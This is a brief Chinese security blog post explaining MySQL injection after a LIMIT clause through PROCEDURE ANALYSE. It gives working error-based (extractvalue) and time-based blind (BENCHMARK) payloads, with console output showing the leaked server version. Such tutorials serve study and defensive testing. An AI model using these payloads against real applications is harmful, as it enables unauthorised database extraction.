limit后面的Mysql注入

暗月博客
暗月博客
暗月博客
809
文章
0
评论
2019年11月21日21:05:26评论378 views字数 679阅读2分15秒阅读模式

先了解一个存储过程analyse:通过分析select查询的结果来对每一列给出优化建议。
 
主要就是通过它来执行我们的报错语句和延时语句。
 
这个是正常情况查询:

mysql> select * from admin;
+----+---------------+----------+
| id | email | password |
+----+---------------+----------+
| 1 | [email protected] | 123456 |
| 2 | [email protected] | 123456 |
| 3 | [email protected] | 123 |
+----+---------------+----------+
3 rows in set (0.01 sec)

limit后的报错注入

mysql> select * from admin order by id limit 0,1 procedure analyse(extractvalue(
rand(),concat(0x3a,version())),1);
ERROR 1105 (HY000): XPATH syntax error: ':5.5.32'

limit后的延时注入:

mysql> SELECT * FROM admin ORDER BY id LIMIT 0,1 PROCEDURE analyse((select extra
ctvalue(rand(),concat(0x3a,(IF(MID(version(),1,1) LIKE 5, BENCHMARK(5000000,SHA1
(1)),1))))),1);
ERROR 1105 (HY000): XPATH syntax error: ':0'//已经延时了

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
暗月博客
  • 本文由 发表于 2019年11月21日21:05:26
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   limit后面的Mysql注入https://cn-sec.com/archives/72135.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息